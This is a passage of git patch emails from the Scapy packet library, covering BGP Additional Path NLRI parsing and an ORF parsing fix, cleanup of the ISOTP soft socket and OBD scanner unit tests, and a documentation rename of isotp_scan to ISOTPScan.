(Additional Path)" + fields_desc = [IntField("nlri_path_id", 0), + BGPFieldIPv4("prefix", "0.0.0.0/0")] + + +class BGPNLRI_IPv6_AP(BGPNLRI_IPv6): + """ + Packet handling IPv6 NLRI fields WITH BGP ADDITIONAL PATH + """ + + name = "IPv6 NLRI (Additional Path)" + fields_desc = [IntField("nlri_path_id", 0), + BGPFieldIPv6("prefix", "::/0")] + class BGPNLRIPacketListField(PacketListField): """ PacketListField handling NLRI fields. """ + __slots__ = ["max_bit_length", "cls_group", "no_length"] - def getfield(self, pkt, s): - lst = [] - length = None - ret = b"" - - if self.length_from is not None: - length = self.length_from(pkt) + def __init__(self, name, default, ip_mode, **kwargs): + super(BGPNLRIPacketListField, self).__init__( + name, default, Packet, **kwargs + ) + self.max_bit_length, self.cls_group = { + "IPv4": (32, [BGPNLRI_IPv4, BGPNLRI_IPv4_AP]), + "IPv6": (128, [BGPNLRI_IPv6, BGPNLRI_IPv6_AP]), + }[ip_mode] + self.no_length = "length_from" not in kwargs - if length is not None: - remain, ret = s[:length], s[length:] - else: + def getfield(self, pkt, s): + if self.no_length: index = s.find(_BGP_HEADER_MARKER) + if index == 0: + return s, [] if index != -1: - remain = s[:index] - ret = s[index:] - else: - remain = s - - while remain: - mask_length_in_bits = orb(remain[0]) - mask_length_in_bytes = (mask_length_in_bits + 7) // 8 - current = remain[:mask_length_in_bytes + 1] - remain = remain[mask_length_in_bytes + 1:] - packet = self.m2i(pkt, current) - lst.append(packet) + self.length_from = lambda pkt: index + remain = s[:self.length_from(pkt)] if self.length_from else s - return remain + ret, lst + cls = self.cls_group[ + detect_add_path_prefix46(remain, self.max_bit_length) + ] + self.next_cls_cb = lambda *args: cls + res = super(BGPNLRIPacketListField, self).getfield(pkt, s) + if self.no_length: + self.length_from = None + return res class _BGPInvalidDataException(Exception): @@ -1824,7 +1890,7 @@ def getfield(self, pkt, s): length_in_bytes = (mask + 7) // 8 current = remain[:length_in_bytes + 1] remain = remain[length_in_bytes + 1:] - prefix = BGPNLRI_IPv6(current) + prefix = self.m2i(pkt, current) lst.append(prefix) return remain, lst @@ -1851,7 +1917,7 @@ class BGPPAMPReachNLRI(Packet): ConditionalField(IP6Field("nh_v6_link_local", "::"), lambda x: x.afi == 2 and x.nh_addr_len == 32), ByteField("reserved", 0), - MPReachNLRIPacketListField("nlri", [], Packet)] + MPReachNLRIPacketListField("nlri", [], BGPNLRI_IPv6)] def post_build(self, p, pay): if self.nlri is None: @@ -1870,8 +1936,7 @@ class BGPPAMPUnreachNLRI_IPv6(Packet): """ name = "MP_UNREACH_NLRI (IPv6 NLRI)" - fields_desc = [BGPNLRIPacketListField( - "withdrawn_routes", [], BGPNLRI_IPv6)] + fields_desc = [BGPNLRIPacketListField("withdrawn_routes", [], "IPv6")] class MPUnreachNLRIPacketField(PacketField): @@ -2113,7 +2178,7 @@ class BGPUpdate(BGP): BGPNLRIPacketListField( "withdrawn_routes", [], - BGPNLRI_IPv4, + "IPv4", length_from=lambda p: p.withdrawn_routes_len ), FieldLenField( @@ -2128,7 +2193,7 @@ class BGPUpdate(BGP): BGPPathAttr, length_from=lambda p: p.path_attr_len ), - BGPNLRIPacketListField("nlri", [], BGPNLRI_IPv4) + BGPNLRIPacketListField("nlri", [], "IPv4") ] def post_build(self, p, pay): @@ -2416,11 +2481,13 @@ def getfield(self, pkt, s): if self.length_from is not None: length = self.length_from(pkt) remain = s + if length <= 0: + return s, [] if length is not None: remain, ret = s[:length], s[length:] while remain: - orf_len = 0 + orf_len = length # Get value length, depending on the ORF type if pkt.orf_type == 64 or pkt.orf_type == 128: @@ -2509,7 +2576,12 @@ class BGPRouteRefresh(BGP): ShortEnumField("afi", 1, address_family_identifiers), ByteEnumField("subtype", 0, rr_message_subtypes), ByteEnumField("safi", 1, subsequent_afis), - PacketField('orf_data', "", BGPORF) + ConditionalField( + PacketField('orf_data', "", BGPORF), + lambda p: ( + (p.underlayer and p.underlayer.len or 24) > 23 + ) + ) ] diff --git a/scapy/fields.py b/scapy/fields.py index 569e71f03db..8b34eb414e8 100644 --- a/scapy/fields.py +++ b/scapy/fields.py @@ -1376,7 +1376,7 @@ def any2i(self, pkt, x): def i2repr(self, pkt, x): # type: (Optional[Packet], bytes) -> str - return plain_str(x) + return plain_str(self.i2h(pkt, x)) def i2h(self, pkt, x): # type: (Optional[Packet], bytes) -> str @@ -1858,7 +1858,7 @@ def any2i(self, pkt, x): def i2repr(self, pkt, x): # type: (Optional[Packet], bytes) -> str - return plain_str(x) + return plain_str(self.i2h(pkt, x)) def i2h(self, pkt, # type: Optional[Packet] diff --git a/scapy/packet.py b/scapy/packet.py index 3af5c3c78db..0ceadb3d253 100644 --- a/scapy/packet.py +++ b/scapy/packet.py @@ -1579,15 +1579,18 @@ def sprintf(self, fmt, relax=1): if num > 1: val = self.payload.sprintf("%%%s,%s:%s.%s%%" % (f, cls, num - 1, fld), relax) # noqa: E501 f = "s" - elif f[-1] == "r": # Raw field value - val = getattr(self, fld) - f = f[:-1] - if not f: - f = "s" else: - val = getattr(self, fld) - if fld in self.fieldtype: - val = self.fieldtype[fld].i2repr(self, val) + try: + val = self.getfieldval(fld) + except AttributeError: + val = getattr(self, fld) + if f[-1] == "r": # Raw field value + f = f[:-1] + if not f: + f = "s" + else: + if fld in self.fieldtype: + val = self.fieldtype[fld].i2repr(self, val) else: val = self.payload.sprintf("%%%s%%" % sfclsfld, relax) f = "s" diff --git a/test/contrib/bgp.uts b/test/contrib/bgp.uts index 9ea83ae0742..2e7720d1b18 100644 --- a/test/contrib/bgp.uts +++ b/test/contrib/bgp.uts @@ -677,6 +677,15 @@ assert(m.path_attr[0].attribute.safi == 1) assert(m.path_attr[0].attribute.afi_safi_specific.withdrawn_routes[0].prefix == "6000::/3") assert(m.nlri == []) += BGPUpdate - Dissection (with BGP Additional Path) +m = BGP(b'\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\x00\x17\x05\x00\x01\x01\x01\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\x00\xd0\x02\x00\xb9\x00\x00\x00\x02\x00\x00\x00\x00\x04 \n\xe9\x19\xb2\x00\x00\x00\x04 \n\xe9\x19\x90\x00\x00\x00\x04 \n\xe9\x19\x93\x00\x00\x00\x04 \n\xe9\x19\xbb\x00\x00\x00\x04 \n\xe9\x19\x9f\x00\x00\x00\x04 \n\xe9\x19\x8c\x00\x00\x00\x04 \n\xe9\x19\xb1\x00\x00\x00\x04 \n\xe9\x19\x8f\x00\x00\x00\x04 \n\xe9\x19\x98\x00\x00\x00\x04 \n\xe9\x19\x9b\x00\x00\x00\x04 \n\xe9\x19\x8b\x00\x00\x00\x04 \n\xe9\x19\xb3\x00\x00\x00\x04 \n\xe9\x19\x91\x00\x00\x00\x04 \n\xe9\x19\xb6\x00\x00\x00\x04 \n\xe9\x19\x94\x00\x00\x00\x04 \n\xe9\x19\x97\x00\x00\x00\x04 \n\xe9\x19\xbc\x00\x00\x00\x04 \n\xe9\x19\x9d\x00\x00\x00\x04 \n\xe9\x19\xa3\x00\x00\x00\x04 \n\xe9\x19\x84\x00\x00\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\x005\x02\x00\x00\x00\x15@\x01\x01\x00@\x02\x00@\x03\x04\n\x16\x0cX@\x05\x04\x00\x00\x00d\x00\x00\x00\x02 \n\xe9\x00\x16\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\x00\x17\x05\x00\x01\x02\x01') +assert m.withdrawn_routes[0].nlri_path_id == 2 +assert len(m.withdrawn_routes) == 21 +assert m.withdrawn_routes[-1].sprintf("%prefix%") == "10.233.25.132/32" +assert len(m.getlayer(BGPUpdate, 2).path_attr) == 4 +assert m.getlayer(BGPUpdate, 2).nlri[0].nlri_path_id == 2 +assert m.getlayer(BGPUpdate, 2).nlri[0].sprintf("%prefix%") == "10.233.0.22/32" + = BGPUpdate - with BGPHeader p = BGP(raw(BGPHeader()/BGPUpdate())) assert(BGPHeader in p and BGPUpdate in p) @@ -733,6 +742,10 @@ assert(m.orf_data[0].entries[1].action == 0) assert(m.orf_data[0].entries[1].match == 0) assert(m.orf_data[0].entries[1].prefix.prefix == "0.0.0.0/0") += BGPRouteRefresh - Dissection (3) - bad ORFS (GH3345) +m = BGPRouteRefresh(b'\x00\x01\x00\x01\x00\x00\x00\x07\x00\x00\x00\x00\x00\x00\x00') +assert m.orf_data.orf_type == 0 +assert m.orf_data.entries[0].load == b'\x00\x00\x00\x00\x00\x00\x00' ########## BGPCapGeneric fuzz() ################################### + BGPCapGeneric fuzz() From 7502226c8b1f437043c3db867f2833f40a56efde Mon Sep 17 00:00:00 2001 From: Nils Weiss Date: Mon, 20 Sep 2021 09:20:40 +0200 Subject: [PATCH 0655/1632] Minor cleanup to stabilize ISOTPSoftSocket unit tests (#3370) * Minor cleanup to stabilize ISOTPSoftSocket unit tests * Fix ISOTPSoftSocket unit tests * try to fix test for pypy * try to fix test * try to fix test * try to fix test --- scapy/automaton.py | 2 +- scapy/contrib/isotp/isotp_soft_socket.py | 2 +- test/contrib/automotive/interface_mockup.py | 23 ++++- test/contrib/isotp_soft_socket.uts | 107 ++++++++------------ 4 files changed, 64 insertions(+), 70 deletions(-) diff --git a/scapy/automaton.py b/scapy/automaton.py index eeb58d14922..91465dae426 100644 --- a/scapy/automaton.py +++ b/scapy/automaton.py @@ -192,7 +192,7 @@ def select(sockets, remain=conf.recv_poll_rate): if s.closed: results.append(s) if results: - return results, None + return results return select_objects(sockets, remain) diff --git a/scapy/contrib/isotp/isotp_soft_socket.py b/scapy/contrib/isotp/isotp_soft_socket.py index d6cfee0a13c..e10a1b82cf8 100644 --- a/scapy/contrib/isotp/isotp_soft_socket.py +++ b/scapy/contrib/isotp/isotp_soft_socket.py @@ -591,7 +591,7 @@ def on_can_recv(self, p): def close(self): # type: () -> None - if self.rx_thread.thread and self.rx_thread.thread.is_alive(): + if self.rx_thread.running: self.rx_thread.stop(True) def _rx_timer_handler(self): diff --git a/test/contrib/automotive/interface_mockup.py b/test/contrib/automotive/interface_mockup.py index 2c410002f59..56e9a853756 100644 --- a/test/contrib/automotive/interface_mockup.py +++ b/test/contrib/automotive/interface_mockup.py @@ -9,16 +9,15 @@ import os import subprocess import sys -import time from platform import python_implementation from scapy.main import load_layer, load_contrib from scapy.config import conf -from scapy.error import log_runtime, Scapy_Exception, warning +from scapy.error import log_runtime, Scapy_Exception import scapy.modules.six as six from scapy.consts import LINUX -from scapy.automaton import ObjectPipe +from scapy.automaton import ObjectPipe, select_objects from scapy.data import MTU from scapy.packet import Packet from scapy.compat import Optional, Type, Tuple, Any @@ -119,6 +118,11 @@ def cleanup_interfaces(): :return: True on success """ + global open_test_sockets + for sock in open_test_sockets: + sock.close() + del sock + if LINUX and _not_pypy and _root: if 0 != subprocess.call(["ip", "link", "delete", iface0]): raise Exception("%s could not be deleted" % iface0) @@ -220,16 +224,20 @@ def exit_if_no_isotp_module(): # """ Define custom SuperSocket for unit tests """ # ############################################################################ +open_test_sockets = list() + class TestSocket(ObjectPipe, object): - nonblocking_socket = True # type: bool + nonblocking_socket = False # type: bool def __init__(self, basecls=None): # type: (Optional[Type[Packet]]) -> None + global open_test_sockets super(TestSocket, self).__init__() self.basecls = basecls self.paired_sockets = list() # type: List[TestSocket] self.closed = False + open_test_sockets.append(self) def close(self): self.closed = True @@ -278,3 +286,10 @@ def sniff(self, *args, **kargs): return SuperSocket.sniff(self, *args, **kargs) else: return SuperSocket.sniff.im_func(self, *args, **kargs) + + @staticmethod + def select(sockets, remain=conf.recv_poll_rate): + # type: (List[SuperSocket], Optional[float]) -> List[SuperSocket] + sock = [s for s in sockets if isinstance(s, ObjectPipe) + and not s._closed] + return select_objects(sock, remain) diff --git a/test/contrib/isotp_soft_socket.uts b/test/contrib/isotp_soft_socket.uts index 59daf3bd27f..7c5fc1ee33b 100644 --- a/test/contrib/isotp_soft_socket.uts +++ b/test/contrib/isotp_soft_socket.uts @@ -6,32 +6,14 @@ = Imports -from scapy.modules.six.moves.queue import Queue +from scapy.modules.six.moves.queue import Queue, Empty from io import BytesIO import scapy.modules.six as six with open(scapy_path("test/contrib/automotive/interface_mockup.py")) as f: exec(f.read()) -= Definition of constants, utility functions and mock classes - - -class MockCANSocket(SuperSocket): - nonblocking_socket = True - def __init__(self, rcvd_queue=None): - self.rcvd_queue = Queue() - self.sent_queue = Queue() - if rcvd_queue is not None: - for c in rcvd_queue: - self.rcvd_queue.put(c) - def recv_raw(self, x=MTU): - pkt = bytes(self.rcvd_queue.get(True, 2)) - return CAN, pkt, None - def send(self, p): - self.sent_queue.put(p) - @staticmethod - def select(sockets, remain=None): - return sockets += Definition of utility functions # hexadecimal to bytes convenience function if six.PY2: @@ -69,79 +51,71 @@ assert(sniffed[0]['ISOTP'].exdst is 0xEA) + ISOTPSoftSocket tests = Create ISOTPSoftSocket -cans = MockCANSocket() +cans = TestSocket(CAN) +stim = TestSocket(CAN) +cans.pair(stim) s = ISOTPSoftSocket(cans, sid=0x641, did=0x241) = Single-frame receive -cans.rcvd_queue.put(CAN(identifier=0x241, data=dhex("05 01 02 03 04 05"))) +stim.send(CAN(identifier=0x241, data=dhex("05 01 02 03 04 05"))) msg = s.recv() assert(msg.data == dhex("01 02 03 04 05")) -assert(cans.sent_queue.empty()) = Single-frame send s.send(ISOTP(dhex("01 02 03 04 05"))) -msg = cans.sent_queue.get(True, 1) +msg = stim.sniff(count=1, timeout=1)[0] assert(msg.data == dhex("05 01 02 03 04 05")) -assert(cans.sent_queue.empty()) -assert(cans.rcvd_queue.empty()) = Two frame receive -cans.rcvd_queue.put(CAN(identifier=0x241, data=dhex("10 09 01 02 03 04 05 06"))) -c = cans.sent_queue.get(True, 2) +stim.send(CAN(identifier=0x241, data=dhex("10 09 01 02 03 04 05 06"))) +c = stim.sniff(count=1, timeout=1)[0] assert (c.data == dhex("30 00 00")) -cans.rcvd_queue.put(CAN(identifier=0x241, data=dhex("21 07 08 09 00 00 00 00"))) +stim.send(CAN(identifier=0x241, data=dhex("21 07 08 09 00 00 00 00"))) msg = s.recv() assert(msg.data == dhex("01 02 03 04 05 06 07 08 09")) -assert(cans.sent_queue.empty()) -assert(cans.rcvd_queue.empty()) + = 20000 bytes receive data = dhex("01 02 03 04 05")*4000 cf = ISOTP(data, dst=0x241).fragment() ff = cf.pop(0) -cans.rcvd_queue.put(ff) -c = cans.sent_queue.get(True, 2) +stim.send(ff) +c = stim.sniff(count=1, timeout=1)[0] assert (c.data == dhex("30 00 00")) for f in cf: - cans.rcvd_queue.put(f) + stim.send(f) msg = s.recv() assert(msg.data == data) -assert(cans.sent_queue.empty()) -assert(cans.rcvd_queue.empty()) = 20000 bytes send data = dhex("01 02 03 04 05")*4000 msg = ISOTP(data, dst=0x641) -succ = threading.Event() ready = threading.Event() fragments = msg.fragment() ack = CAN(identifier=0x241, data=dhex("30 00 00")) -def acker(): - ready.set() - ff = cans.sent_queue.get(True, 2) - assert(ff == fragments[0]) - cans.rcvd_queue.put(ack) - for fragment in fragments[1:]: - cf = cans.sent_queue.get(True, 2) - assert(fragment == cf) - succ.set() - -thread = threading.Thread(target=acker, name="acker") +def sender(): + ready.wait(timeout=5) + s.send(msg) + +thread = threading.Thread(target=sender, name="sender") thread.start() -ready.wait(timeout=5) -s.send(msg) +ready.set() +ff = stim.sniff(count=1, timeout=1)[0] +assert (bytes(ff) == bytes(fragments[0])) +stim.send(ack) +cfs = stim.sniff(count=len(fragments) - 1, timeout=1) +for fragment, cf in zip(fragments[1:], cfs): + assert (bytes(fragment) == bytes(cf)) thread.join(15) assert not thread.is_alive() -succ.wait(2) -assert(succ.is_set()) = Close ISOTPSoftSocket @@ -149,34 +123,37 @@ s.close() s = None = Create and close ISOTP soft socket -with ISOTPSoftSocket(MockCANSocket(), sid=0x641, did=0x241) as s: +with ISOTPSoftSocket(TestSocket(CAN), sid=0x641, did=0x241) as s: assert(s.impl.rx_thread.running) - s.close() - assert(not s.impl.rx_thread.running) + +assert(not s.impl.rx_thread.running) = Verify that all threads will die when GC collects the socket +~ not_pypy import gc -s = ISOTPSoftSocket(MockCANSocket(), sid=0x641, did=0x241) +cans = TestSocket(CAN) +s = ISOTPSoftSocket(cans, sid=0x641, did=0x241) assert(s.impl.rx_thread.running) impl = s.impl s = None +cans.close() r = gc.collect() assert(not impl.rx_thread.running) = Test on_recv function with single frame -with ISOTPSoftSocket(MockCANSocket(), sid=0x641, did=0x241) as s: +with ISOTPSoftSocket(TestSocket(CAN), sid=0x641, did=0x241) as s: s.ins.on_recv(CAN(identifier=0x241, data=dhex("05 01 02 03 04 05"))) msg, ts = s.ins.rx_queue.recv() assert(msg == dhex("01 02 03 04 05")) = Test on_recv function with empty frame -with ISOTPSoftSocket(MockCANSocket(), sid=0x641, did=0x241) as s: +with ISOTPSoftSocket(TestSocket(CAN), sid=0x641, did=0x241) as s: s.ins.on_recv(CAN(identifier=0x241, data=b"")) assert(s.ins.rx_queue.empty()) = Test on_recv function with single frame and extended addressing -with ISOTPSoftSocket(MockCANSocket(), sid=0x641, did=0x241, extended_rx_addr=0xea) as s: +with ISOTPSoftSocket(TestSocket(CAN), sid=0x641, did=0x241, extended_rx_addr=0xea) as s: cf = CAN(identifier=0x241, data=dhex("EA 05 01 02 03 04 05")) s.ins.on_recv(cf) msg, ts = s.ins.rx_queue.recv() @@ -184,10 +161,12 @@ with ISOTPSoftSocket(MockCANSocket(), sid=0x641, did=0x241, extended_rx_addr=0xe assert ts == cf.time = CF is sent when first frame is received -cans = MockCANSocket() +cans = TestSocket(CAN) +can_out = TestSocket(CAN) +cans.pair(can_out) with ISOTPSoftSocket(cans, sid=0x641, did=0x241) as s: s.ins.on_recv(CAN(identifier=0x241, data=dhex("10 20 01 02 03 04 05 06"))) - can = cans.sent_queue.get(True, 1) + can = can_out.sniff(timeout=1, count=1)[0] assert(can.identifier == 0x641) assert(can.data == dhex("30 00 00")) @@ -507,7 +486,7 @@ with new_can_socket0() as isocan, ISOTPSoftSocket(isocan, sid=0x641, did=0x241) with new_can_socket(iface0) as cans: cans.send(CAN(identifier = 0x241, data = dhex("10 11 01 02 03 04 05 06"))) cans.send(CAN(identifier = 0x241, data = dhex("21 07 08 09 0A 0B 0C 0D"))) - isotp = s.sniff(timeout=1) + isotp = s.sniff(timeout=0.1) assert(len(isotp) == 0) @@ -515,7 +494,7 @@ assert(len(isotp) == 0) with new_can_socket0() as isocan, ISOTPSoftSocket(isocan, sid=0x641, did=0x241) as s: with new_can_socket(iface0) as cans: cans.send(CAN(identifier = 0x241, data = dhex("10 11 01 02 03 04 05 06"))) - isotp = s.sniff(timeout=1) + isotp = s.sniff(timeout=0.1) assert(len(isotp) == 0) @@ -541,7 +520,7 @@ evt = threading.Event() def acker(): with new_can_socket(iface0) as cans: evt.set() - can = cans.sniff(timeout=1, count=1)[0] + can = cans.sniff(timeout=0.1, count=1)[0] cans.send(CAN(identifier = 0x241, data=dhex("30 04 00"))) thread = Thread(target=acker) From 1c6d84667f6b64e6d19a7788c680fddda8ee7b73 Mon Sep 17 00:00:00 2001 From: Nils Weiss Date: Mon, 20 Sep 2021 11:56:24 +0200 Subject: [PATCH 0656/1632] Fix outdated documentation (#3373) --- doc/scapy/layers/automotive.rst | 10 +++++----- 1 file changed, 5 insertions(+), 5 deletions(-) diff --git a/doc/scapy/layers/automotive.rst b/doc/scapy/layers/automotive.rst index 48969089a72..c64c05ca471 100644 --- a/doc/scapy/layers/automotive.rst +++ b/doc/scapy/layers/automotive.rst @@ -43,7 +43,7 @@ function to get all information about one specific protocol. | | | | | | | ISOTPSniffer, ISOTPMessageBuilder, ISOTPSession | | | | | -| | | ISOTPHeader, ISOTPHeaderEA, isotp_scan | +| | | ISOTPHeader, ISOTPHeaderEA, ISOTPScan | | | | | | | | ISOTP, ISOTP_SF, ISOTP_FF, ISOTP_CF, ISOTP_FC | +----------------------+----------------------+--------------------------------------------------------+ @@ -930,10 +930,10 @@ Close sockets:: isoTpSocketVCan1.close() -isotp_scan and ISOTPScanner ---------------------------- +ISOTPScan and ISOTPScanner +-------------------------- -isotp_scan is a utility function to find ISOTP-Endpoints on a CAN-Bus. +ISOTPScan is a utility function to find ISOTP-Endpoints on a CAN-Bus. ISOTPScanner is a commandline-utility for the identical function. .. image:: ../graphics/animations/animation-scapy-isotpscan.svg @@ -989,7 +989,7 @@ Interactive shell usage example:: >>> conf.contribs['CANSocket'] = {'use-python-can': False} >>> load_contrib('cansocket') >>> load_contrib('isotp') - >>> socks = isotp_scan(CANSocket("vcan0"), range(0x700, 0x800), can_interface="vcan0") + >>> socks = ISOTPScan(CANSocket("vcan0"), range(0x700, 0x800), can_interface="vcan0") >>> socks [< at 0x7f98e27c8210>, < at 0x7f98f9079cd0>, From 6247a95aef96b103b76166843d868f96b69f66d8 Mon Sep 17 00:00:00 2001 From: Nils Weiss Date: Tue, 21 Sep 2021 12:10:19 +0200 Subject: [PATCH 0657/1632] Cleanup unit test for OBDScanner (#3356) --- scapy/contrib/automotive/obd/scanner.py | 9 +- .../contrib/automotive/scanner/enumerator.py | 11 +- scapy/tools/automotive/obdscanner.py | 56 +++--- test/contrib/automotive/ccp.uts | 2 + test/contrib/automotive/gm/scanner.uts | 8 +- test/contrib/automotive/obd/scanner.uts | 172 ++++++++---------- 6 files changed, 130 insertions(+), 128 deletions(-) diff --git a/scapy/contrib/automotive/obd/scanner.py b/scapy/contrib/automotive/obd/scanner.py index e1d55674447..cf30d745273 100644 --- a/scapy/contrib/automotive/obd/scanner.py +++ b/scapy/contrib/automotive/obd/scanner.py @@ -57,9 +57,12 @@ def get_supported(self, socket, state, **kwargs): for _, _, r, _, _ in self.results_with_positive_response: dr = r.data_records[0] key = next(iter((dr.lastlayer().fields.keys()))) - supported += [int(i[-2:], 16) for i in - getattr(dr, key, ["xxx00"])] - return [i for i in supported if i % 0x20] + try: + supported += [int(i[-2:], 16) for i in + getattr(dr, key, ["xxx00"])] + except TypeError: + pass + return list(set([i for i in supported if i % 0x20])) def execute(self, socket, state, **kwargs): # type: (_SocketUnion, EcuState, Any) -> None diff --git a/scapy/contrib/automotive/scanner/enumerator.py b/scapy/contrib/automotive/scanner/enumerator.py index 6537dac70ed..3adc01513df 100644 --- a/scapy/contrib/automotive/scanner/enumerator.py +++ b/scapy/contrib/automotive/scanner/enumerator.py @@ -185,7 +185,7 @@ def execute(self, socket, state, **kwargs): if socket.closed: log_interactive.critical("[-] Socket closed during scan.") - return + raise Scapy_Exception("Socket closed during scan") self._store_result(state, req, res) @@ -229,6 +229,8 @@ def _evaluate_response(self, """ if response is None: if cast(bool, kwargs.pop("retry_if_none_received", False)): + log_interactive.debug( + "[i] Retry %s because None received", repr(request)) return self._populate_retry(state, request) return cast(bool, kwargs.pop("exit_if_no_answer_received", False)) @@ -323,6 +325,9 @@ def _evaluate_retry(self, if retry_if_busy_returncode and response.service == 0x7f \ and self._get_negative_response_code(response) == 0x21: + log_interactive.debug( + "[i] Retry %s because retry_if_busy_returncode received", + repr(request)) return self._populate_retry(state, request) return False @@ -462,7 +467,7 @@ def results_with_negative_response(self): Helper function to get all results with negative response :return: all results with negative response """ - return [cast(_AutomotiveTestCaseFilteredScanResult, r) for r in self._results # noqa: E501 + return [r for r in self.results_with_response if r.resp and r.resp.service == 0x7f] @property @@ -472,7 +477,7 @@ def results_with_positive_response(self): Helper function to get all results with positive response :return: all results with positive response """ - return [cast(_AutomotiveTestCaseFilteredScanResult, r) for r in self._results # noqa: E501 + return [r for r in self.results_with_response # noqa: E501 if r.resp and r.resp.service != 0x7f] @property diff --git a/scapy/tools/automotive/obdscanner.py b/scapy/tools/automotive/obdscanner.py index 154e1f09a72..45bedddd839 100755 --- a/scapy/tools/automotive/obdscanner.py +++ b/scapy/tools/automotive/obdscanner.py @@ -81,6 +81,32 @@ def usage(is_error): file=sys.stderr if is_error else sys.stdout) +def get_can_socket(channel, interface, python_can_args): + if PYTHON_CAN: + if python_can_args: + arg_dict = dict((k, literal_eval(v)) for k, v in + (pair.split('=') for pair in + re.split(', | |,', python_can_args))) + return CANSocket(bustype=interface, channel=channel, **arg_dict) + else: + return CANSocket(bustype=interface, channel=channel) + else: + return CANSocket(channel=channel) + + +def get_isotp_socket(csock, source, destination): + return ISOTPSocket(csock, source, destination, basecls=OBD, padding=True) + + +def run_scan(isock, enumerators, full_scan, verbose, timeout): + s = OBD_Scanner(isock, test_cases=enumerators, full_scan=full_scan, + verbose=verbose, + timeout=timeout) + print("Starting OBD-Scan...") + s.scan() + s.show_testcases() + + def main(): channel = None @@ -161,29 +187,13 @@ def main(): sys.exit(1) csock = None + isock = None try: - if PYTHON_CAN: - if python_can_args: - arg_dict = dict((k, literal_eval(v)) for k, v in - (pair.split('=') for pair in - re.split(', | |,', python_can_args))) - csock = CANSocket(bustype=interface, channel=channel, - **arg_dict) - else: - csock = CANSocket(bustype=interface, channel=channel) - else: - csock = CANSocket(channel=channel) - - with ISOTPSocket(csock, source, destination, - basecls=OBD, padding=True) as isock: - signal.signal(signal.SIGINT, signal_handler) + csock = get_can_socket(channel, interface, python_can_args) + isock = get_isotp_socket(csock, source, destination) - s = OBD_Scanner(isock, test_cases=enumerators, - full_scan=full_scan, verbose=verbose, - timeout=timeout) - print("Starting OBD-Scan...") - s.scan() - s.show_testcases() + signal.signal(signal.SIGINT, signal_handler) + run_scan(isock, enumerators, full_scan, verbose, timeout) except Exception as e: usage(True) @@ -195,7 +205,9 @@ def main(): sys.exit(1) finally: - if csock is not None: + if isock: + isock.close() + if csock: csock.close() diff --git a/test/contrib/automotive/ccp.uts b/test/contrib/automotive/ccp.uts index 76df1ae6d8f..1e786a9ee01 100644 --- a/test/contrib/automotive/ccp.uts +++ b/test/contrib/automotive/ccp.uts @@ -952,6 +952,8 @@ assert hasattr(dto, "load") == False assert dto.MTA0_extension == 0xff assert dto.MTA0_address == 0xffffffff ++ Cleanup + = Delete vcan interfaces assert cleanup_interfaces() diff --git a/test/contrib/automotive/gm/scanner.uts b/test/contrib/automotive/gm/scanner.uts index 4908a4fe35f..a627f94e9f3 100644 --- a/test/contrib/automotive/gm/scanner.uts +++ b/test/contrib/automotive/gm/scanner.uts @@ -38,7 +38,7 @@ def executeScannerInVirtualEnvironment(supported_responses, enumerators, **kwarg try: scanner = GMLAN_Scanner( tester, reset_handler=answering_machine.reset_state, - test_cases=enumerators, timeout=0.1, retry_if_none_received=True, + test_cases=enumerators, timeout=0.5, retry_if_none_received=True, unittest=True, delay_state_change=0, **kwargs) scanner.scan(timeout=200) finally: @@ -474,3 +474,9 @@ assert 0xf0f0 in addrs result = tc.show(dump=True) assert "RequestOutOfRange received " in result + ++ Cleanup + += Delete vcan interfaces + +assert cleanup_interfaces() diff --git a/test/contrib/automotive/obd/scanner.uts b/test/contrib/automotive/obd/scanner.uts index bfc0b267159..7763638fa7e 100644 --- a/test/contrib/automotive/obd/scanner.uts +++ b/test/contrib/automotive/obd/scanner.uts @@ -1,5 +1,5 @@ % Regression tests for obd_scan -~ needs_root not_pypy automotive_comm + + Configuration ~ conf @@ -9,7 +9,6 @@ with open(scapy_path("test/contrib/automotive/interface_mockup.py")) as f: exec(f.read()) - ############ ############ + Load general modules @@ -20,41 +19,18 @@ load_contrib("automotive.obd.obd", globals_dict=globals()) + Load OBD_scan = imports -from subprocess import call - from scapy.contrib.automotive.obd.scanner import OBD_Scanner load_contrib("automotive.obd.scanner", globals_dict=globals()) load_contrib("automotive.ecu", globals_dict=globals()) -print("Set delay to lower utilization") -conf.contribs['EcuAnsweringMachine']['send_delay'] = 0.004 - -= Create answers - -s3 = OBD()/OBD_S03_PR(dtcs=[OBD_DTC()]) - -s1_pid00 = OBD() / OBD_S01_PR(data_records=[OBD_S01_PR_Record() / OBD_PID00(supported_pids="PID03+PID0B+PID0F")]) -s6_mid00 = OBD() / OBD_S06_PR(data_records=[OBD_S06_PR_Record() / OBD_MID00(supported_mids="")]) -s8_tid00 = OBD() / OBD_S08_PR(data_records=[OBD_S08_PR_Record() / OBD_TID00(supported_tids="")]) -s9_iid00 = OBD() / OBD_S09_PR(data_records=[OBD_S09_PR_Record() / OBD_IID00(supported_iids="")]) - +conf.contribs['EcuAnsweringMachine']['send_delay'] = 0 -s1_pid01 = OBD()/OBD_S01_PR(data_records=[OBD_S01_PR_Record()/OBD_PID01()]) -s1_pid03 = OBD()/OBD_S01_PR(data_records=[OBD_S01_PR_Record()/OBD_PID03(fuel_system1=0, fuel_system2=2)]) -s1_pid0B = OBD()/OBD_S01_PR(data_records=[OBD_S01_PR_Record()/OBD_PID0B(data=100)]) -s1_pid0F = OBD()/OBD_S01_PR(data_records=[OBD_S01_PR_Record()/OBD_PID0F(data=50)]) +ecu = TestSocket(OBD) +tester = TestSocket(OBD) +ecu.pair(tester) -example_responses = \ - [EcuResponse(responses=s3), - EcuResponse(responses=s1_pid00), - EcuResponse(responses=s6_mid00), - EcuResponse(responses=s8_tid00), - EcuResponse(responses=s9_iid00), - EcuResponse(responses=s1_pid01), - EcuResponse(responses=s1_pid03), - EcuResponse(responses=s1_pid0B), - EcuResponse(responses=s1_pid0F)] += Create answers responses = [ EcuResponse(responses=OBD(service=65)/OBD_S01_PR(data_records=[OBD_S01_PR_Record(pid=0)/OBD_PID00(supported_pids=3191777299)])), @@ -116,33 +92,35 @@ responses = [ EcuResponse(responses=OBD(service=73)/OBD_S09_PR(data_records=[OBD_S09_PR_Record(iid=4)/OBD_IID04(calibration_identifications=[b'282xxxxxxx300044', b'00090xxxxxx00031'], count=2)])), 